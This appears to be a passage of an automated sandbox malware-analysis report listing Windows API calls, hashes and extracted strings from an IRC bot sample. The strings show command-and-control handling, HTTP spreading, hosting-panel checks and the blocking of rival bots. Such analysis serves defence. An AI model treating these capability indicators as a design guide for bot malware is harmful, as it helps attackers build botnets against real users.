                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                    • Part of subcall function 0040A310: EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                    • Part of subcall function 0040A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                    • Part of subcall function 0040A310: LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$File_memicmp$CriticalSectionsprintfsscanf$AttributesCreateEnterExitLeaveMoveThread_snprintf_vsnprintfclosesocket
                                                                  • String ID: %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).$%s.Detected process "%S" sending an IRC packet to server %s:%d.$%s:%d$JOIN$JOIN %255s$PRIVMSG$PRIVMSG %255s$block$cnc$pdef
                                                                  • API String ID: 1085873876-1467418891
                                                                  • Opcode ID: e046ed22e18b5f022a18a89072ff7c27e4d94646e1ec26cf3a102e4814f05911
                                                                  • Instruction ID: 423ddb9557b74d048bf2445d23ea001235c7c8144a5ecbbbaa60eb2ae93ad116
                                                                  • Opcode Fuzzy Hash: e046ed22e18b5f022a18a89072ff7c27e4d94646e1ec26cf3a102e4814f05911
                                                                  • Instruction Fuzzy Hash: A0510A71A402147AEB20AB558C86FDF7378AB44744F15443BFE05B22D1D6BCA9A0C66E
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00366A68
                                                                  • lstrlenA.KERNEL32 ref: 00366B03
                                                                  • _memicmp.MSVCRT ref: 00366B0E
                                                                  • _memicmp.MSVCRT ref: 00366B22
                                                                  • _memicmp.MSVCRT ref: 00366B36
                                                                  • sscanf.MSVCRT ref: 00366B4F
                                                                  • sscanf.MSVCRT ref: 00366B69
                                                                  • lstrlenA.KERNEL32(?), ref: 00366BD5
                                                                  • SetFileAttributesW.KERNEL32(003AA710,00000080), ref: 00366C31
                                                                  • MoveFileExW.KERNEL32(003AA710,00000000,00000004), ref: 00366C40
                                                                  • closesocket.WS2_32(?), ref: 00366C60
                                                                  • ExitThread.KERNEL32 ref: 00366C67
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A335
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A34F
                                                                    • Part of subcall function 0036A310: memset.MSVCRT ref: 0036A369
                                                                    • Part of subcall function 0036A310: _vsnprintf.MSVCRT ref: 0036A382
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A39A
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                    • Part of subcall function 0036A310: _snprintf.MSVCRT ref: 0036A3CC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                    • Part of subcall function 0036A310: sprintf.MSVCRT ref: 0036A3EC
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                    • Part of subcall function 0036A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                    • Part of subcall function 0036A310: EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                    • Part of subcall function 0036A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                    • Part of subcall function 0036A310: LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$File_memicmp$CriticalSectionsprintfsscanf$AttributesCreateEnterExitLeaveMoveThread_snprintf_vsnprintfclosesocket
                                                                  • String ID: %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).$%s.Detected process "%S" sending an IRC packet to server %s:%d.$%s:%d$JOIN$JOIN %255s$PRIVMSG$PRIVMSG %255s$block$cnc$pdef
                                                                  • API String ID: 1085873876-1467418891
                                                                  • Opcode ID: 7ea626670aec71195430e5b4b59219cb6596a04e0d519a59df40cf0a6cbbc656
                                                                  • Instruction ID: 9f087dbbe22057c7bd61358c46622ab06823b17063583d3f08f272212150ea88
                                                                  • Opcode Fuzzy Hash: 7ea626670aec71195430e5b4b59219cb6596a04e0d519a59df40cf0a6cbbc656
                                                                  • Instruction Fuzzy Hash: 1651E772940204BBDB339F598C87BEE77ACEB44784F54C468F908E7145E7B59980C6A2
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00410071
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00410080
                                                                  • lstrlenA.KERNEL32(00000000), ref: 004100AB
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 004100B6
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 004100CB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 004100D2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 004100E3
                                                                  • strtok.MSVCRT ref: 004100F9
                                                                  • strstr.MSVCRT ref: 00410117
                                                                  • strstr.MSVCRT ref: 00410129
                                                                  • lstrcatA.KERNEL32(00000000,00412B84), ref: 00410141
                                                                  • _memicmp.MSVCRT ref: 0041014E
                                                                  • lstrcatA.KERNEL32(00000000,Content-Length: ), ref: 00410160
                                                                  • _snprintf.MSVCRT ref: 00410177
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0041018A
                                                                  • strtok.MSVCRT ref: 00410193
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 004101AB
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004101B2
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004101BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Heap$Alloclstrlenstrstrstrtok$FreeProcess_memicmp_snprintflstrcpymemset
                                                                  • String ID: $Content-Length:
                                                                  • API String ID: 4006885983-3599722475
                                                                  • Opcode ID: 930fb4186d5d29aae00d3e8cc07e0d4c77cb9a1f345ff1cca50be87740647e53
                                                                  • Instruction ID: 31871e1923dfa0c5687494671088c66f74ce18a02ae0b8733e53a839020a0827
                                                                  • Opcode Fuzzy Hash: 930fb4186d5d29aae00d3e8cc07e0d4c77cb9a1f345ff1cca50be87740647e53
                                                                  • Instruction Fuzzy Hash: 4A41F671640308BBDB20AF619C45FEF776C9F58715F04411AFE08A6241E7FD9AC18BA9
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00370071
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00370080
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003700AB
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003700B6
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 003700CB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003700D2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003700E3
                                                                  • strtok.MSVCRT ref: 003700F9
                                                                  • strstr.MSVCRT ref: 00370117
                                                                  • strstr.MSVCRT ref: 00370129
                                                                  • lstrcatA.KERNEL32(00000000,00372B84), ref: 00370141
                                                                  • _memicmp.MSVCRT ref: 0037014E
                                                                  • lstrcatA.KERNEL32(00000000,Content-Length: ), ref: 00370160
                                                                  • _snprintf.MSVCRT ref: 00370177
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0037018A
                                                                  • strtok.MSVCRT ref: 00370193
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 003701AB
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003701B2
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003701BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Heap$Alloclstrlenstrstrstrtok$FreeProcess_memicmp_snprintflstrcpymemset
                                                                  • String ID: $Content-Length:
                                                                  • API String ID: 4006885983-3599722475
                                                                  • Opcode ID: 785b1f36c3484554cb94478a506b2014c95fc7e3a33d6a27746f1f97760e0a10
                                                                  • Instruction ID: 6b9da164bae029f2740c9dad6040932da04f915576571e331aa645526113dcaa
                                                                  • Opcode Fuzzy Hash: 785b1f36c3484554cb94478a506b2014c95fc7e3a33d6a27746f1f97760e0a10
                                                                  • Instruction Fuzzy Hash: BD41D276600308FBE736AB649C86FEF776C9F54711F418154FD0CAA241E6BC9A818AE1
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040A335
                                                                  • memset.MSVCRT ref: 0040A34F
                                                                  • memset.MSVCRT ref: 0040A369
                                                                  • _vsnprintf.MSVCRT ref: 0040A382
                                                                  • sprintf.MSVCRT ref: 0040A39A
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                  • _snprintf.MSVCRT ref: 0040A3CC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                  • sprintf.MSVCRT ref: 0040A3EC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                  • EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                  • LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040A484
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A48B
                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A496
                                                                  • LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A4A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CriticalSectionmemset$FileLeavesprintf$CloseCreateEnterHandleSleepWrite_snprintf_vsnprintf
                                                                  • String ID: %d.$30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4010528547-3602371622
                                                                  • Opcode ID: b5ff21767b458ba7174b6b2b87fc53a5282e9994ed1a393112634c82c948d704
                                                                  • Instruction ID: 8e1fe3b8e3d8ffe6930c52ef9346d3acd19d967879cd91ce29727965d539cad2
                                                                  • Opcode Fuzzy Hash: b5ff21767b458ba7174b6b2b87fc53a5282e9994ed1a393112634c82c948d704
                                                                  • Instruction Fuzzy Hash: 2B41DBB6680318BBD711E7A1DD46FEA732CDF88705F004495F708E60D1DAF85A848B6D
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036A335
                                                                  • memset.MSVCRT ref: 0036A34F
                                                                  • memset.MSVCRT ref: 0036A369
                                                                  • _vsnprintf.MSVCRT ref: 0036A382
                                                                  • sprintf.MSVCRT ref: 0036A39A
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB,%s.%s,blk,?,?,000001FE,00370A8E), ref: 0036A3AD
                                                                  • _snprintf.MSVCRT ref: 0036A3CC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003674EB), ref: 0036A3DB
                                                                  • sprintf.MSVCRT ref: 0036A3EC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A3FB
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0036A404
                                                                  • EnterCriticalSection.KERNEL32(003AAC34,?,?,00000000), ref: 0036A436
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0036A452
                                                                  • LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A464
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0036A484
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036A48B
                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A496
                                                                  • LeaveCriticalSection.KERNEL32(003AAC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036A4A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CriticalSectionmemset$FileLeavesprintf$CloseCreateEnterHandleSleepWrite_snprintf_vsnprintf
                                                                  • String ID: %d.$30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4010528547-3602371622
                                                                  • Opcode ID: cb384aff42950af4482244874d53568bc84263ac0237a7db9b5c0fbe6e956184
                                                                  • Instruction ID: 094304f4de7eb34230010a769aced7d87c4b4ae731eb5822ba881decc654bb99
                                                                  • Opcode Fuzzy Hash: cb384aff42950af4482244874d53568bc84263ac0237a7db9b5c0fbe6e956184
                                                                  • Instruction Fuzzy Hash: D741D9B6540218BBD736E7A4DC86FEA732CDB88711F408494F70CEA0C1DAF46A448B65
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00410202
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00410213
                                                                  • EnterCriticalSection.KERNEL32(0044B4E4), ref: 00410223
                                                                  • strstr.MSVCRT ref: 00410243
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410254
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0041025F
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 00410272
                                                                  • strstr.MSVCRT ref: 00410281
                                                                  • _snprintf.MSVCRT ref: 004102C8
                                                                  • strstr.MSVCRT ref: 004102EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00410322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00410386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 004103EE
                                                                  • LeaveCriticalSection.KERNEL32(0044B4E4), ref: 004103FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0041041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Freestrstr$CriticalSectionlstrlen$AllocEnterLeaveProcess_snprintfatoilstrcpymemset
                                                                  • String ID: $%s.%s hijacked!$%s=$http$httpi$httpspread$int$msg
                                                                  • API String ID: 2097228407-1593535274
                                                                  • Opcode ID: ff486f561777821ef5b35251fa65b707b74c89090bba5d12407a9cc2068a4af8
                                                                  • Instruction ID: 6b613a8a9dd3db62d23416ef6319fd59981c507d6a8595e650e32660f9c914f4
                                                                  • Opcode Fuzzy Hash: ff486f561777821ef5b35251fa65b707b74c89090bba5d12407a9cc2068a4af8
                                                                  • Instruction Fuzzy Hash: 6851A771A40319ABDB109BA19C85BFFB778EB44704F14443AFD14A2241DAB8ADD08BAD
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00370202
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00370213
                                                                  • EnterCriticalSection.KERNEL32(003AB4E4), ref: 00370223
                                                                  • strstr.MSVCRT ref: 00370243
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370254
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0037025F
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 00370272
                                                                  • strstr.MSVCRT ref: 00370281
                                                                  • _snprintf.MSVCRT ref: 003702C8
                                                                  • strstr.MSVCRT ref: 003702EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 00370322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003703EE
                                                                  • LeaveCriticalSection.KERNEL32(003AB4E4), ref: 003703FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Freestrstr$CriticalSectionlstrlen$AllocEnterLeaveProcess_snprintfatoilstrcpymemset
                                                                  • String ID: $%s.%s hijacked!$%s=$http$httpi$httpspread$int$msg
                                                                  • API String ID: 2097228407-1593535274
                                                                  • Opcode ID: de2a05e81f1c55a784774adb29724fdc543c08ba84a2788db625b74b946f50ae
                                                                  • Instruction ID: 83c4a7c6c5b6033b952e093220dd5cab71418451650e68d0a07fdf874e67edf2
                                                                  • Opcode Fuzzy Hash: de2a05e81f1c55a784774adb29724fdc543c08ba84a2788db625b74b946f50ae
                                                                  • Instruction Fuzzy Hash: 2251DA76A40615EBEB379B649C45EBFB77CEB44700F04C469F91CA6241DBB8AD008BA0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstrstrtok$lstrcmplstrlen
                                                                  • String ID: WA$001$332$376$433$JOIN$KCIK %s$MOTD$PING$PPNG %s$PPPPMSG$SEND %s %s
                                                                  • API String ID: 4048585210-1945936343
                                                                  • Opcode ID: b8cde92cb1254a2a7ae024d0b2fa4488480de74b93d1f53c48958e3b38037d86
                                                                  • Instruction ID: b43457d1463e33dec7e291493da2b720a1f97c649ceaa871d4bac8b1837a23f4
                                                                  • Opcode Fuzzy Hash: b8cde92cb1254a2a7ae024d0b2fa4488480de74b93d1f53c48958e3b38037d86
                                                                  • Instruction Fuzzy Hash: 4651E8B6E4020966D710B669FC42BEA736CDB84719F10817BFC08E2281F67DE85546ED
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: strstrstrtok$lstrcmplstrlen
                                                                  • String ID: W7$001$332$376$433$JOIN$KCIK %s$MOTD$PING$PPNG %s$PPPPMSG$SEND %s %s
                                                                  • API String ID: 4048585210-2164369966
                                                                  • Opcode ID: 57b28443d6339407f4bb483d10d5ab8964cf87f8e9a9965947bc74028fcd8489
                                                                  • Instruction ID: 932cc7a2230090d39bbedd9688339fd4891fded00908d606f370be7e0ea6408c
                                                                  • Opcode Fuzzy Hash: 57b28443d6339407f4bb483d10d5ab8964cf87f8e9a9965947bc74028fcd8489
                                                                  • Instruction Fuzzy Hash: E95119B6F4020926D733BA29BC42EAA73ACDB94315F04C565FC0CD6206FA75EC504AE1
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,00407CC2,00000000,00412914,?,?,?,?,?,?), ref: 0040AE11
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001,?,00407CC2,00000000,00412914,?,?,?,?,?,?,?,00000000), ref: 0040AE23
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,?,00000000), ref: 0040AE41
                                                                  • strstr.MSVCRT ref: 0040AE59
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040AE70
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0040AE77
                                                                  • lstrcatA.KERNEL32(00000000,00412B54), ref: 0040AE7F
                                                                  • strtok.MSVCRT ref: 0040AE8E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AEA1
                                                                  • _strnicmp.MSVCRT ref: 0040AEA6
                                                                  • strtok.MSVCRT ref: 0040AEB9
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AED5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AEEB
                                                                  • strstr.MSVCRT ref: 0040AF10
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0040AF20
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0040AF27
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040AF2B
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0040AF3D
                                                                  • lstrcpyA.KERNEL32(?,00000001), ref: 0040AF58
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0040AF5F
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0040AF6B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AF82
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040AF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Free$lstrcpy$Allocstrstrstrtok$??2@_strnicmplstrcat
                                                                  • String ID:
                                                                  • API String ID: 3119447416-0
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,00367CC2,00000000,00372914,?,?,?,?,?,?), ref: 0036AE11
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001,?,00367CC2,00000000,00372914,?,?,?,?,?,?,?,00000000), ref: 0036AE23
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,?,00000000), ref: 0036AE41
                                                                  • strstr.MSVCRT ref: 0036AE59
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036AE70
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036AE77
                                                                  • lstrcatA.KERNEL32(00000000,00372B54), ref: 0036AE7F
                                                                  • strtok.MSVCRT ref: 0036AE8E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036AEA1
                                                                  • _strnicmp.MSVCRT ref: 0036AEA6
                                                                  • strtok.MSVCRT ref: 0036AEB9
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AED5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AEEB
                                                                  • strstr.MSVCRT ref: 0036AF10
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0036AF20
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0036AF27
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AF2B
                                                                  • lstrlenA.KERNEL32(00000001), ref: 0036AF3D
                                                                  • lstrcpyA.KERNEL32(?,00000001), ref: 0036AF58
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0036AF5F
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 0036AF6B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AF82
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0036AF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Free$lstrcpy$Allocstrstrstrtok$??2@_strnicmplstrcat
                                                                  • String ID:
                                                                  • API String ID: 3119447416-0
                                                                  APIs
                                                                  • strstr.MSVCRT ref: 00407C62
                                                                  • _stricmp.MSVCRT(?,cPanel,blog,%s-%s-%s,?,?,00000000), ref: 00407D58
                                                                  • _stricmp.MSVCRT(00000000,WHM), ref: 00407D71
                                                                  • _stricmp.MSVCRT(?,WHCMS), ref: 00407D8A
                                                                  • _stricmp.MSVCRT(?,Directadmin), ref: 00407DA3
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A335
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A34F
                                                                    • Part of subcall function 0040A310: memset.MSVCRT ref: 0040A369
                                                                    • Part of subcall function 0040A310: _vsnprintf.MSVCRT ref: 0040A382
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A39A
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB,%s.%s,blk,?,?,000001FE,00410A8E), ref: 0040A3AD
                                                                    • Part of subcall function 0040A310: _snprintf.MSVCRT ref: 0040A3CC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,004074EB), ref: 0040A3DB
                                                                    • Part of subcall function 0040A310: sprintf.MSVCRT ref: 0040A3EC
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A3FB
                                                                    • Part of subcall function 0040A310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 0040A404
                                                                    • Part of subcall function 0040A310: EnterCriticalSection.KERNEL32(0044AC34,?,?,00000000), ref: 0040A436
                                                                    • Part of subcall function 0040A310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A452
                                                                    • Part of subcall function 0040A310: LeaveCriticalSection.KERNEL32(0044AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A464
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00407E02
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00407E12
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407401
                                                                    • Part of subcall function 004073E0: memset.MSVCRT ref: 00407419
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 00407431
                                                                    • Part of subcall function 004073E0: _snprintf.MSVCRT ref: 00407449
                                                                    • Part of subcall function 004073E0: _vsnprintf.MSVCRT ref: 0040746B
                                                                    • Part of subcall function 004073E0: lstrlenA.KERNEL32(?), ref: 0040747A
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  Strings
